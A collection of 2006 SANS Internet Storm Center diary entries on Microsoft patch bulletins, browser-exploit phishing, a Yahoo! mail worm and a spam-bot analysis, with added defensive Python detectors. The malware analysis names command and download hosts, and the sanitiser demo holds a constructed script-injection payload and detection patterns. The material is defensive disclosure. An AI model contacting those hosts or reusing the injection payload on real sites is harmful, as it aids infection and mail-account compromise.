"People starting panic withdrawals, some of the accounts were reported closed due to technical reasons, many ATMs are not operating. Does it seem that one of the Australia's greatest goes bankrupt? The full story could be found here: <URL>
Well, hope that isn't true... Anyway You'd rather check your balance..."
The URL contains an obfuscated JavaScript. The JavaScript code will check which browser the user is running and will redirect him to the appropriate exploit, served by a CGI script.
The JavaScript will also detect if a user is running Service Pack 2, and append that information as a CGI parameter as well.
The following Internet Explorer vulnerabilities are exploited:
MS03-011
MS06-006
MS06-014
And one Mozilla FireFox vulnerability is exploited as well:
MFSA2005-50
For Firefox users, there is a good add-on for blocking malicious JavaScript, called "NoScript". You can find more information at the following site:
https://addons.mozilla.org/firefox/722/
Webcast archive available
https://www.sans.org/webcasts/show.php?webcastid=90622
Exploits for most recent Microsoft Patches
Here is a quick list of what we have seen so far:
MS06-024: Windows Media Player.
MS06-030: SMB Privilege Escalation.
Thanks to Juha-Matti for finding the exploits!
MS06-029: Script injection through Exchange/OWA
Affected Software:
- Microsoft Exchange 2000 Server Service Pack 3 with the August 2004 Exchange 2000 Server Post-Service Pack 3 Update Rollup
- Microsoft Exchange Server 2003 Service Pack 1
- Microsoft Exchange Server 2003 Service Pack 2
Severity: Important
Description: Microsoft Exchange servers that expose Outlook Web Access (OWA) so clients can check email remotely are placing those clients at risk from a script injection vulnerability. A specially crafted email sent to the user and opened in OWA would cause the embedded script to run. According to Microsoft: "A script injection vulnerability exists that could allow an attacker to run a malicious script. If this malicious script is run, it would run in the security context of the user on the client." If you are running the Microsoft Exchange OWA service, it is very important that you patch ASAP.
If you have been tracking the issue with Yahoo web mail, this should sound very familiar.
The vulnerability is covered in CVE-2006-1193.
--
Lorna Hutcheson
0 Comments
MS06-031: RPC Mutual Authentication Vulnerability
This looks to be an obscure bug that only affects Windows 2000. In reality, the conditions for exploitation seem rare and no code execution is possible. The bug only affects custom RPC applications using SSL with mutual authentication, which probably doesn't amount to many applications out there. Finally, the impact is limited to an attacker impersonating a trusted RPC server; it doesn't allow code execution.
For all the overworked sysadmins: you can probably leave this at the bottom of your patch list.
This vulnerability is also covered in CVE-2006-2380.
--
Kyle Haugsness
0 Comments
MS06-030: Microsoft SMB Vulnerabilities
MS06-030 covers two vulnerabilities. The more severe one ("SMB Driver Elevation of Privilege Vulnerability") will allow an attacker who has regular user access to a system to gain administrator access. The attack requires some form of regular access, for example valid login credentials or an exploit against a regular user on the system.
You could disable the Workstation service to mitigate this vulnerability. However, this is probably only going to work for stand alone workstations. Disabling the Workstation service will break file and printer sharing.
The second vulnerability ("SMB Invalid Handle Vulnerability") results in a Denial of Service condition, but like the first one it requires valid login credentials.
This vulnerability is covered in CVE-2006-2373.
--
Johannes Ullrich
0 Comments
Barracuda Networks outage statement
"Outage on 6/13/2006 for Barracuda Spam Firewall Customers
Barracuda Networks remains committed to open communications with our customer base. This morning, we had an outage that affected a large number of Barracuda Spam Firewall customers. The affected customers were Barracuda Spam Firewall customers employing the virus scan feature of the Barracuda Spam Firewall using virus definition 1.5.144. The outage resolved itself with a subsequent Energize Update to virus definition 1.5.145.
Details:
Beginning at 4:53 AM PST today, a faulty virus definition was released that had an incomplete virus database (virus definition 1.5.144). To protect our customers in the event such a circumstance occurred, the Barracuda Spam Firewall has a built in precautionary feature which automatically prevents email from being sent through in order to keep potentially infected emails from being delivered. Any Barracuda Spam Firewall in the field that had received virus definition 1.5.144 immediately began to queue all incoming messages until the complete virus database became available.
At 7:02 AM PST, the majority of Barracuda Spam Firewalls automatically received virus definition 1.5.145 containing the complete virus database, and email began to process normally for those customers previously affected.
The cause of the incomplete virus definition has been identified and resolved, and additional measures have been put in place to prevent this issue from occurring in the future.
Due to the volume of calls to our Technical Support department during this period, we did experience a phone system malfunction which caused many customers to have to wait for longer periods of time than what they have come to expect. We apologize for any delay or inconvenience this may have caused and feel confident that our support department is back online and ready to assist customers right away.
Thank you for your patience. We look forward to continuing to provide all our customers with the same high quality service and support that they have come to rely on.
Sincerely,
Barracuda Networks Support and Operations Teams"
0 Comments
MS06-032: Source routing buffer overflow
While Microsoft rates this only as important, we at the Internet Storm Center feel that it is very critical. It is easy to exploit: a single (spoofed) packet could allow an attacker to "own" a vulnerable system. The TCP/IP stack is vulnerable to a buffer overflow in the handling of source-routed packets.
While some firewalls might protect against this, consider systems that are used on the road, such as in airports and hotels: they must be protected now.
Workarounds:
- Block packets with source routing options in the firewall. According to Microsoft "IP source route options 131 and 137" are the dangerous ones, but why would you allow source routing through your firewall anyway?
- A personal firewall might help as well
- Disable source routing in windows by setting a registry key (see the Microsoft bulletin for details) [highly recommended action, even if you patched already]
--
Swa Frantzen -- section 66
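To make the "block source-routed packets" workaround testable, here is an added example (not code from the diary or from Microsoft) that parses the IPv4 header of a raw packet and reports the Loose (131) and Strict (137) Source Route options the bulletin names. The packets it builds at the bottom are constructed for the example; feeding it frames from a capture is left to the reader.

```python
"""Flag IPv4 packets that carry a source-routing option (MS06-032).

Added example for this diary entry; it is not code from the diary or from
Microsoft. Option numbers 131 (LSRR) and 137 (SSRR) are the ones the bulletin
names; the packets built at the bottom are constructed for the example.
"""
import struct

LSRR = 131  # Loose Source and Record Route
SSRR = 137  # Strict Source and Record Route
SOURCE_ROUTE_OPTIONS = {LSRR: "LSRR", SSRR: "SSRR"}


def parse_ipv4_options(packet: bytes):
    """Return [(option_number, option_payload), ...] from an IPv4 header.

    Malformed headers raise ValueError instead of being guessed at, which is
    the behaviour you want in a monitor that is itself exposed to the packet.
    """
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    if packet[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or ihl > len(packet):
        raise ValueError("bad IHL")
    opts = packet[20:ihl]
    found, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:          # End of Option List
            break
        if kind == 1:          # No Operation: single byte, no length
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option without length byte")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")
        found.append((kind, bytes(opts[i + 2:i + length])))
        i += length
    return found


def source_route_hops(packet: bytes):
    """Return (option_name, [hop, ...]) for the first LSRR/SSRR option in the
    header, or None if the packet is not source routed."""
    for kind, payload in parse_ipv4_options(packet):
        if kind in SOURCE_ROUTE_OPTIONS:
            addrs = payload[1:]          # byte 0 is the route pointer
            hops = [".".join(str(b) for b in addrs[j:j + 4])
                    for j in range(0, len(addrs) - len(addrs) % 4, 4)]
            return SOURCE_ROUTE_OPTIONS[kind], hops
    return None


def build_ipv4(src: str, dst: str, options: bytes = b"") -> bytes:
    """Build a minimal IPv4 header (no payload) carrying `options`, padded to
    a 32-bit boundary. Used only to construct sample packets."""
    options += b"\x00" * ((-len(options)) % 4)
    ihl = 5 + len(options) // 4
    header = struct.pack("!BBHHHBBH4s4s",
                         (4 << 4) | ihl, 0, ihl * 4, 0, 0, 64, 6, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
    return header + options


def source_route_option(kind: int, *hops: str) -> bytes:
    """Encode an LSRR/SSRR option: kind, length, pointer (4 = first hop), hops."""
    body = b"".join(bytes(int(o) for o in h.split(".")) for h in hops)
    return bytes([kind, 3 + len(body), 4]) + body


# Constructed samples: one loose-source-routed packet, one clean packet.
ROUTED = build_ipv4("192.0.2.1", "192.0.2.2",
                    source_route_option(LSRR, "10.0.0.1", "10.0.0.2"))
CLEAN = build_ipv4("192.0.2.1", "192.0.2.2")

if __name__ == "__main__":
    for pkt in (ROUTED, CLEAN):
        print(source_route_hops(pkt))   # ('LSRR', ['10.0.0.1', '10.0.0.2']) then None
```

The parser deliberately refuses a header whose option length runs past the IHL instead of reading on; a detector that trusts the length byte is exactly the kind of code the bulletin is about.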
0 Comments
MS06-025: RRAS arbitrary code execution
A CRITICAL vulnerability in Microsoft's Routing and Remote Access Service (RRAS). A successful exploit could allow an attacker to execute arbitrary code. In order to exploit the vulnerability remotely, an attacker has to be able to log in to a system first.
RRAS is used to connect to Microsoft networks remotely via dial-up modems. With RRAS, a user can dial up to a remote network (e.g. a corporate network) and access all services on the remote network as if connected locally. In addition, RRAS is used for various multi-protocol LAN/WAN connections via VPNs.
It is not clear how exactly the exploit would occur over a network, or what the traffic will look like. We will update this diary once we figure it out. According to this list, RRAS uses port 1701/UDP (L2TP) and 1723/TCP (PPTP), as well as IP protocols 47 (GRE), 51 (AH) and 50 (ESP). In particular, the protocols other than TCP/UDP may not be blocked by all firewalls.
For most users, the best option is to disable the service. See the bulletin on how to do this. Double check that you have disabled all guest accounts or other accounts that allow connections with no or weak passwords.
--
Johannes Ullrich
0 Comments
MS06-011 Updated
This update was originally released in March. Our analysis at the time is located here.
The bulletin was re-released today with a number of tweaks. "This update has been revised to include updated registry key values for the NetBT, RemoteAccess, and TCPIP services. These values have been modified to be the same as Windows XP Service Pack 2 on Windows XP Service Pack 1 systems, and the same as Windows 2003 Service Pack 1 on Windows 2003 systems with no service pack applied. Customers are encouraged to apply this revised update for additional security from privilege elevation through these services as described in the Vulnerability Details section of this security bulletin."
Scott Fendley - Univ of Arkansas
0 Comments
MS06-028: PowerPoint malformed record / Remote Code Execution
Vulnerable: Office 2000, XP, 2003 for Windows and Office v.X and Office 2004 for Mac (yes, this vulnerability is present on Mac systems)
This vulnerability affects PowerPoint documents and allows for remote code execution with the privileges of the logged in user. A malicious PowerPoint document with a malformed record can corrupt system memory and be used to execute code. This patch replaces MS06-010 for PowerPoint 2000.
An attacker would have to somehow convince a victim to open a malicious PowerPoint file to exploit this vulnerability (either by e-mail or web download, for instance). If the user is logged in as administrator, an attacker would gain full control of the system. Presumably, different malicious PowerPoint files would have to be created to exploit Windows and Mac (i.e. the same PowerPoint file would likely not be able to exploit both operating systems).
This patch is classified critical for PowerPoint 2000 only, and important for all other versions (including Mac). This patch fixes the vulnerability detailed in CVE-2006-0022. Users are advised to apply this patch if they use Microsoft PowerPoint.
John Bambenek -- University of Illinois
0 Comments
MS06-024: buffer overflow in windows media player
Windows Media Player is vulnerable in its handling of PNG images.
Microsoft rates this vulnerability as critical. It allows remote code execution.
Attack vectors of both email and web are possible through the use of .wmz files.
Workarounds will be based on content filtering in gateways, but may fall short if you count encrypted messages and the like as possible exploit vectors.
--
Swa Frantzen -- section 66
0 Comments
MS06-027: MS Word object pointer / Remote Code Execution
Vulnerable: Word 2000 and later (including Word Viewer 2003) and Works 2000 and later
Not Vulnerable: Word for Mac
This is a remote code execution vulnerability that uses a malformed object pointer to corrupt system memory and can be used to execute arbitrary code. If the user logged in has administrative privileges, the exploit will run with those same privileges and could take complete system control.
In order to successfully exploit this vulnerability, an attacker would have to persuade a user to open a malicious Word document, either through e-mail or a web page. This vulnerability is marked critical and Microsoft Office users should apply the patch immediately.
It is possible to not log in with an administrator-level account, but that would not prevent "spyware" classes of attacks.
--
John Bambenek -- University of Illinois
0 Comments
Microsoft patch day
- MS06-021 Cumulative patch for Internet Explorer - Critical
- MS06-022 ART image library buffer overflow - Critical
- MS06-023 Microsoft JScript memory corruption - Critical
- MS06-024 Windows media player - Critical
- MS06-025 RRAS - Critical
- MS06-026 Graphics rendering engine remote code execution - Critical
- MS06-027 Word remote code execution - Critical
- MS06-028 Powerpoint remote code execution -Critical
- MS06-029 Exchange - Important
- MS06-030 SMB privilege escalation - Important
- MS06-031 RPC mutual authentication spoofing - Moderate
- MS06-032 IP source routing allows remote code execution - Important
Handlers actively working on these include Arrigo, John, Kyle, Lorna, Johannes, Scott and Swa.
0 Comments
MS06-026: Graphics Rendering Engine / Remote Code Execution
** This vulnerability ONLY applies to Windows 98, 98SE, and ME (We aren't still running these, are we?). Windows 2000, XP and beyond are not vulnerable **
This is a critical vulnerability in the Graphics Rendering Engine that allows remote code execution on the target system using specifically crafted WMF files. When successfully exploited, the target system can be completely compromised. This is a new vulnerability, not associated with the WMF vulnerabilities from earlier this year. An attacker can exploit it with a specifically crafted web page (and getting the victim to view that page) or by sending an exploit in email (where the email reader renders images).
If you are running Windows 98, 98SE, or ME, you should upgrade your operating system to Windows 2000, XP or later. If you cannot upgrade, this patch should be installed immediately.
John Bambenek -- University of Illinois
0 Comments
MS06-023: Microsoft's JScript remote code execution
A problem in JScript where it releases memory too soon can cause memory corruption and lead to remote code execution.
The attack vector is web based: visiting malicious content is sufficient to exploit the browser. This is strongly linked with MS06-021 and Microsoft recommends installing both at the same time.
Obviously it's better not to log in with administrative rights as it makes the impact of these vulnerabilities a lot worse.
--
Swa Frantzen -- section 66
0 Comments
MS06-022: buffer overflow in ART image rendering library
ART is an image file format (yep, image formats are still popular research topics for hackers, it seems). The format is used by AOL.
The impact is remote code execution; a user logged in with administrative rights hands the attacker the whole system.
Microsoft rates this vulnerability as critical.
The patch removes support for ART image files from MSIE, so they will not be rendered any longer.
It's interesting to note that the image library is an optional install on Windows 2000.
Workarounds:
- Do not log in as administrator or with an account with administrative rights; it's dangerous.
- Consider switching to an alternative browser. They work really well, and it makes the hackers' lives harder if not all of us use the same browser with the same vulnerabilities.
--
Swa Frantzen -- section 66
0 Comments
MS06-021: Internet Explorer patch
Fixes memory corruption that can lead to remote code execution, disclosure of sensitive information and creation of additional accounts on the host operating system.
Microsoft rates this patch as critical; considering an impact of remote code execution on the client system, for a browser we would rate such a thing as very critical.
Microsoft claims the attack vector has to be web based, the use of it through outlook should not be possible.
Please note that this patch affects the issues in kb 917425 by terminating the compatibility period.
This includes a fix for publicly known bugs: CSS cross domain information disclosure (CVE-2005-4089) and address bar spoofing (CVE-2006-1626).
--
Swa Frantzen -- section 66
0 Comments
Javascript/AJAX/Worm Like Behavior
fixed the exploit in its new beta client.
Software developers and webmasters alike should take this as a warning: new exploits will be coming that use JavaScript and Ajax-like behavior to spread. The current worm could readily be modified to spread across many systems that do not escape JavaScript when displaying data from a foreign source. Web developers should re-examine their code and make sure that display functions do not deliver potentially malicious code.
After testing several popular web applications, we have found that several are in fact vulnerable to the very same type of exploit. Good coding practices, verifying that users are coming from an authorized form and that they are not submitting malicious code, can protect developers against this type of exploit.
We will be sending notice to affected software vendors that we have identified at this time, however we currently do not have plans to publish specific applications until new releases/patches are available.
0 Comments
Yahoo! mass-mailer
It was first reported to the ISC at 12:32 UTC and now appears to be circulating in two slightly different variants. Analysis by Lorna and myself shows that both variants are flawed: they spread very effectively but do not actually perform the intended action. The mass-mailer attempts to open a browser window to www.lastdata.com but a spelling mistake prevents this from working. The website appears to be dormant and rejecting accesses.
The release of a new version barely two hours after we started our analysis which partially fixes the first version indicates that the code is very much under development and you should assume that the remaining bugs will be rapidly ironed out.
To activate the mass-mailer it is sufficient to open the mail message without clicking on the attachment and it will scour your address list and send itself as an attachment (forwarded message) to everyone on it. It searches for both @yahoo.com and @yahoogroups.com e-mail addresses.
There is currently no trivial fix for Yahoo! mail, as turning off JavaScript in the browser will prevent you from reading your e-mail. For Yahoo! groups it is recommended that moderators/administrators turn off attachments for the time being to prevent this spreading further.
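The MS06-029 OWA entry, the "Javascript/AJAX/Worm Like Behavior" entry and this mass-mailer all come down to one mistake: a webmail front end displaying a foreign message body without neutralising it. The following is an added example (not code from Exchange, Yahoo! Mail or the diary) that puts the blacklist filter these worms walk past next to the two approaches that stop them. The message body and the small tag allow-list are constructed for the example.

```python
"""Displaying untrusted mail HTML: the blacklist that these worms walk past,
next to the escaping and allow-listing that stops them.

Added example for the MS06-029 (OWA script injection), "Javascript/AJAX/Worm
Like Behavior" and Yahoo! mass-mailer entries; it is not code from Exchange,
Yahoo! Mail or the diary. The message body is constructed for the example.
"""
import html
import re

_TAG_RE = re.compile(r"<\s*(/?)\s*([a-zA-Z][a-zA-Z0-9]*)([^>]*)>")
_HREF_RE = re.compile(r"""href\s*=\s*["']?\s*(https?://[^"'\s>]+)""", re.I)
ALLOWED_TAGS = {"p", "br", "b", "i", "a"}   # assumed allow-list for this example


def strip_script_tags(body: str) -> str:
    """The blacklist approach: remove <script> blocks and pass the rest through.
    Event-handler attributes and javascript: URLs survive, so it fails."""
    return re.sub(r"(?is)<script\b.*?</script\s*>", "", body)


def escape_everything(body: str) -> str:
    """Safe default: render the message as text. Nothing in it can execute."""
    return html.escape(body, quote=True)


def allowlist_html(body: str) -> str:
    """Keep a few harmless tags, drop every attribute except an http(s) href on
    <a>, and escape everything else, including any tag not on the list."""
    out, pos = [], 0
    for m in _TAG_RE.finditer(body):
        out.append(html.escape(body[pos:m.start()], quote=True))
        closing, name, attrs = m.group(1), m.group(2).lower(), m.group(3)
        if name not in ALLOWED_TAGS:
            out.append(html.escape(m.group(0), quote=True))    # neutralise unknown tag
        elif closing:
            out.append(f"</{name}>")
        elif name == "a":
            href = _HREF_RE.search(attrs)
            out.append(f'<a href="{html.escape(href.group(1), quote=True)}">' if href else "<a>")
        else:
            out.append(f"<{name}>")        # onload=, style=, ... are discarded here
        pos = m.end()
    out.append(html.escape(body[pos:], quote=True))
    return "".join(out)


def contains_active_content(rendered: str) -> bool:
    """Does the rendered HTML still carry a real <script>, an on* handler or a
    javascript: URL inside a tag? Escaped text has no '<' so it never matches."""
    for m in _TAG_RE.finditer(rendered):
        name, attrs = m.group(2).lower(), m.group(3)
        if name == "script" or re.search(r"(?i)\bon\w+\s*=|javascript:", attrs):
            return True
    return False


# Constructed worm-style message: a script block, an event handler and a
# javascript: link, alongside one legitimate link that should survive.
WORM_BODY = ('<p>Hi!</p><script>spread()</script>'
             '<img src="x" onerror="spread()">'
             '<a href="javascript:spread()">story</a>'
             '<a href="http://example.net/story">story</a>')

if __name__ == "__main__":
    for label, fn in (("blacklist", strip_script_tags),
                      ("escape", escape_everything),
                      ("allow-list", allowlist_html)):
        print(f"{label:10s} active content left: {contains_active_content(fn(WORM_BODY))}")
```

The regex tag matching is enough to show the difference between the three policies on this input; a production webmail should hand the body to a real HTML sanitiser built on a proper parser rather than to hand-written patterns, because browsers will repair markup that a regex does not even see as a tag.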
0 Comments
SANSFIRE: Internet Storm Center Training Event
SANSFIRE will run from July 5th-13th in Washington DC (great opportunity to arrive on the 4th and watch the fireworks). For details, see the course overview and the SANS@Night schedule as well as the special event schedule.
0 Comments
Microsoft Upcoming Bulletins Release
1) Nine Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical.
Prior to the release of the bulletins, Microsoft encourages administrators to review the following articles and take appropriate steps for their environment:
• Microsoft Security Advisory 912945 (Non-Security Update for Internet Explorer)
• Microsoft Knowledge Base Article 912945 (Internet Explorer ActiveX update)
• Microsoft Knowledge Base Article 917425 (Internet Explorer ActiveX compatibility patch for Mshtml.dll)
• Information for Developers about Internet Explorer
According to Microsoft, users who apply the security update will receive the ActiveX update regardless of whether they have applied the compatibility patch.
2) One Microsoft Security Bulletin affecting Microsoft Exchange. The highest Maximum Severity rating for this is Important.
As the update will include the functionality change (Microsoft Knowledge Base Article 912918 - Users cannot send e-mail messages from a mobile device or from a shared mailbox in Exchange 2000 Server and in Exchange Server 2003), administrators are urged to review the Knowledge Base article prior to release and take steps appropriate for their environment.
3) Two Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical.
4) One non-security High-Priority Update for Windows on Windows Update (WU) and Software Update Services (SUS).
5) Two non-security High-Priority Updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).
6) An updated version of the Microsoft Windows Malicious Software Removal Tool.
0 Comments
MS06-015 will not provide patch for windows 98 and ME.
The suggested workaround is blocking incoming traffic to TCP port 139 on any unpatched systems. This should at best be a temporary step; unsupported operating systems are a greater liability than supported ones.
Many thanks to everyone that sent us a pointer to this story.
More details can be found at:
http://www.microsoft.com/technet/security/Bulletin/MS06-015.mspx
http://blogs.technet.com/msrc/archive/2006/06/09/434300.aspx
0 Comments
Ethereal becomes Wireshark
0 Comments
WinGate Update
Melvin wrote to let us know that an updated version (6.1.3) is now available from http://www.wingate.com/download.php.
Thanks, Melvin!
0 Comments
Numbers Spam Solved
0 Comments
phpBB 2.0.21
There are some minor security improvements in the code; check the announcement for more details. Most of the code changes appear to be more functionality oriented than security oriented.
Considering the level of attention phpBB gets from the bad guys out there, it's best not to hesitate for long and upgrade really soon.
--
Swa Frantzen - Section 66
0 Comments
WinGate HTTP proxy vulnerability, remote DoS & Code Execution
Information is available here;
ISS rates this High Risk
WinGate HTTP proxy buffer overflow
Secunia - WinGate WWW Proxy Server Buffer Overflow Vulnerability
I do not see patch information available at this time.
0 Comments
A malware jungle
Detection
We got an interesting piece of malware from one of our readers, Robert. Robert detected one of his systems trying to connect to port 25 on various servers around the world. As this immediately screams "spam bot", Robert decided to analyze the box further. He captured some packets (you know that we at ISC love to analyze network traffic) and found an interesting binary that he submitted to us for analysis.
Analysis
55e30602f27fa4272c3bd2dd9d701224 extdrvr.exe
Received results for file: extdrvr.exe
==========================
Antivirus Version Last update Result
AntiVir 6.34.1.37 06.06.2006 no virus found
Authentium 4.93.8 06.06.2006 no virus found
Avast 4.7.844.0 06.06.2006 no virus found
AVG 386 06.06.2006 no virus found
BitDefender 7.2 06.06.2006 no virus found
CAT-QuickHeal 8.00 06.06.2006 no virus found
ClamAV devel-20060426 06.06.2006 no virus found
DrWeb 4.33 06.06.2006 no virus found
eTrust-InoculateIT 23.72.29 06.06.2006 no virus found
eTrust-Vet 12.6.2244 06.06.2006 no virus found
Ewido 3.5 06.06.2006 no virus found
Fortinet 2.77.0.0 06.06.2006 no virus found
F-Prot 3.16f 06.06.2006 no virus found
Ikarus 0.2.65.0 06.06.2006 no virus found
Kaspersky 4.0.2.24 06.06.2006 no virus found
McAfee 4778 06.06.2006 no virus found
Microsoft 1.1441 06.07.2006 no virus found
NOD32v2 1.1582 06.06.2006 no virus found
Norman 5.90.17 06.06.2006 no virus found
Panda 9.0.0.4 06.06.2006 Suspicious file
Sophos 4.05.0 06.06.2006 no virus found
Symantec 8.0 06.06.2006 no virus found
TheHacker 5.9.8.155 06.05.2006 no virus found
UNA 1.83 06.06.2006 no virus found
VBA32 3.11.0 06.06.2006 no virus found
After we analyzed this binary, we discovered a malware jungle. So, this is what's happening:
extdrvr.exe is the spam bot that Robert detected. This malware is particularly nasty: at the moment we were writing this diary, only one of the 26 anti-virus engines on VirusTotal flagged it as suspicious.
When executed, the spam bot connects to spm.freecj.com and asks for the list of e-mail addresses to send spam to, together with the e-mail body. Immediately after this is downloaded, it will try sending the spam.
But that's not all. The malware also downloads other Trojan downloaders which, in turn, download other stuff.
First downloader that the main spam bot downloads is http://69.31.46.144/[REMOVED]/d1.html. This downloader will in turn download a pretty nasty dialer (so, making money *is* behind all this), from a well known malware network (that some of you probably already filtered): http://85.255.114.166/[REMOVED].exe.
The dialer will make itself persistent across reboots and will make services RasMan and TapiSrv automatically start at boot.
The dialer will also get the number it should call from http://216.80.7.64/[REMOVED]/getnumtemp.asp?nip=0.
0815205b98f2449de6db9b89cfae6f24 d1.html
3a62b9180ae98b9ad32980d0fbe1aa72 [REMOVED].exe
If this wasn't enough, prepare for more. The dialer will now download another downloader (are we getting lost in all this?), http://207.226.177.110/[REMOVED]. We're not completely sure what this downloader does, as it will download about 14kb of data from various sites, but this data seems to be encrypted. When we get more information about this, we'll update the diary.
1083e1401bc49ff8c167e912a3555c20 [REMOVED]
Back to the spam bot. What's interesting is that it will download and replace the machine's hosts file. Big deal, we've seen that a million times. Among all the standard AV vendors' web sites, and Microsoft Windows Update, the newly downloaded hosts file prevents user from visiting about 50 .biz sites, well known for spreading malware (for example, www.iframebiz.biz, www.toolbarbiz.biz, etc.). Trying to eliminate the competition here?
Lessons?
As always, learning lessons is the most important part of handling incidents. Anti-virus obviously doesn't do much for you when the malware is not detected, so we should learn not to place all our trust in that channel for detecting malware. Robert detected this piece of malware through an IDS and correlation of logs. Monitoring your outgoing traffic, even in the absence of an IDS, can do the trick: looking for spikes in outgoing email is a good way to detect unexpected spam bots such as these. The blocking of the traditional sites via a hosts file is also worth building monitoring for; if it gets used you know something is going on, and a second look will be well-spent effort.
Removal? Once you are dealing with dozens of pieces of malware embedding themselves left and right, your luck in getting it off painlessly has run out.
Finding everything that went wrong is very hard: the malware being pulled in may have changed between the time the machine fetched it and the time you fetch it again, potentially changing (and thus invalidating) much of the result.
Proactively keeping all systems up to date is good and helps, but making sure the really secret stuff cannot reside on, or even be consulted from, a machine connected somehow to the Internet is a good step as well. A good place to build this is a data classification (actually, data handling) policy. Define the most critical information assets and isolate them.
At this point we have not identified the initial infection vector yet.
--
Bojan Zdrnja
Swa Frantzen
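The two detection ideas in the lessons above (a hosts file that blackholes the AV vendors, and a desktop suddenly talking SMTP to the world) are cheap to implement. The following is an added example, not code from the diary: the hosts file content, the firewall log format and its lines are all constructed, and the watched vendor domain list is an assumption to replace with your own.

```python
"""Two cheap detections from the lessons above: a hosts file that blackholes
security vendors, and a workstation that suddenly talks SMTP to the world.

Added example for the "A malware jungle" entry; it is not code from the diary.
The hosts file, the firewall log format and its lines are constructed, and the
vendor domain list is an assumption to replace with your own.
"""
import ipaddress
import re

WATCHED_DOMAINS = ("windowsupdate.com", "microsoft.com", "symantec.com",
                   "mcafee.com", "sophos.com", "kaspersky.com", "virustotal.com")


def suspicious_hosts_entries(hosts_text):
    """Return (hostname, address) for every line that pins a watched domain.
    Loopback counts: a workstation should not resolve its AV vendor locally."""
    hits = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        addr, *names = line.split()
        for name in names:
            if any(name == d or name.endswith("." + d) for d in WATCHED_DOMAINS):
                hits.append((name, addr))
    return hits


# Assumed firewall log format (constructed): "<timestamp> <src> -> <dst>:<port> <proto>"
LOG_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (\w+)$")


def smtp_talkers(log_lines, mail_servers, threshold=5):
    """Return internal sources that opened TCP/25 to at least `threshold`
    distinct destinations other than the organisation's own mail servers."""
    allowed = {ipaddress.ip_address(m) for m in mail_servers}
    dests = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        _, src, dst, port, proto = m.groups()
        if proto.lower() != "tcp" or port != "25":
            continue
        dst_ip = ipaddress.ip_address(dst)
        if dst_ip in allowed:
            continue
        dests.setdefault(src, set()).add(dst_ip)
    return sorted(src for src, seen in dests.items() if len(seen) >= threshold)


# Constructed hosts file in the style the diary describes.
HOSTS_SAMPLE = """127.0.0.1 localhost
127.0.0.1 www.symantec.com liveupdate.symantec.com   # dropped in by the bot
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 www.iframebiz.biz
"""

# Constructed firewall log: 10.1.1.50 fans out to five foreign MTAs.
FW_LOG = [
    "2006-06-07T10:00:01 10.1.1.50 -> 10.1.1.5:25 tcp",       # own mail server: fine
    "2006-06-07T10:00:02 10.1.1.50 -> 192.0.2.10:25 tcp",
    "2006-06-07T10:00:02 10.1.1.50 -> 192.0.2.11:25 tcp",
    "2006-06-07T10:00:03 10.1.1.50 -> 198.51.100.7:25 tcp",
    "2006-06-07T10:00:03 10.1.1.50 -> 198.51.100.8:25 tcp",
    "2006-06-07T10:00:04 10.1.1.50 -> 203.0.113.3:25 tcp",
    "2006-06-07T10:00:04 10.1.1.50 -> 203.0.113.3:25 tcp",    # retry, same MTA
    "2006-06-07T10:00:05 10.1.1.51 -> 10.1.1.5:25 tcp",
    "2006-06-07T10:00:05 10.1.1.51 -> 192.0.2.10:25 tcp",
    "2006-06-07T10:00:06 10.1.1.52 -> 192.0.2.10:80 tcp",
    "2006-06-07T10:00:06 10.1.1.52 -> 192.0.2.53:25 udp",
]

if __name__ == "__main__":
    print(suspicious_hosts_entries(HOSTS_SAMPLE))
    print(smtp_talkers(FW_LOG, ["10.1.1.5"]))
```

Counting distinct destinations rather than raw connections keeps a legitimate retry storm to one MTA from tripping the rule, while a bot that works through a downloaded address list fans out across many MTAs in minutes.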
0 Comments
GD DoS
Details about a vulnerability (and exploit) have been released on full disclosure that claim to cause the library to run an infinite loop while decoding crafted images. It's clear that when used this will lead to severely degraded performance of webservers.
No patch available so far, monitor http://www.boutell.com/gd/ if you use it in a vulnerable fashion.
Thanks Jim!
--
Swa Frantzen - Section 66
0 Comments
javascript file upload entry
While this attack needs more to become a bit effective (like making the user type the needed letters), it does show the dangers of running javascript once again. Your best choice if you use e.g. FireFox is to use something like Noscript. It allows you to turn javascript off by default and turn it on as needed for selected sites (those where the webmaster doesn't care for users not wanting to expose themselves to randomly downloaded executable content)
Apparently both Firefox and MSIE suffer from this.
--
Swa Frantzen - Section66
0 Comments
Spamassassin - upgrade
SpamAssassin has two new releases out. They fix a vulnerability that, given specific command line options, opens up spamassassin to remote command execution as the user spamassassin is running as.
Solution: upgrade to version 3.0.6 or 3.1.3 as soon as possible, or as a workaround do not use the vulnerable command line combination (apparently both "--vpopmail" and "-P" (paranoid) need to be turned on).
Thanks to fellow handlers Jim and Patrick.
If you do take the time to upgrade, I'd suggest to make sure you run it as a user that has hardly any rights and/or chroot it.
--
Swa Frantzen - Section 66
0 Comments
Spam - spam - spam
Users report receiving messages appearing to originate from themselves, with only numbers as subject and body.
The body does appear to be HTML encoded, but it's so basic as to not pose a threat so far.
It would be a good idea to investigate whether you can drop email that appears to be from your own organization while originating outside of it. If your users do not send such email (e.g. because they use a VPN to connect back to the inside while on the road), dropping that email might cut down on a few spams.
Some fun while on this subject (it's a Tuesday after a 3-day weekend in some countries):
All relations to the SPAM luncheon meat product are purely accidental, even if the term was inspired by a 1975 sketch from Monty Python. Most of us think spam started back in 1994 when two lawyers advertised their green card scam in each and every Usenet newsgroup. Some digging around revealed much earlier attempts in 1978 on the precursor to the modern Internet. It just goes to show you're never around for too long to learn something new.
--
Swa Frantzen - Section 66
0 Comments
Farewell 6Bone
-------------------------
Jim Clausing, jclausing at isc dot sans dot org
0 Comments
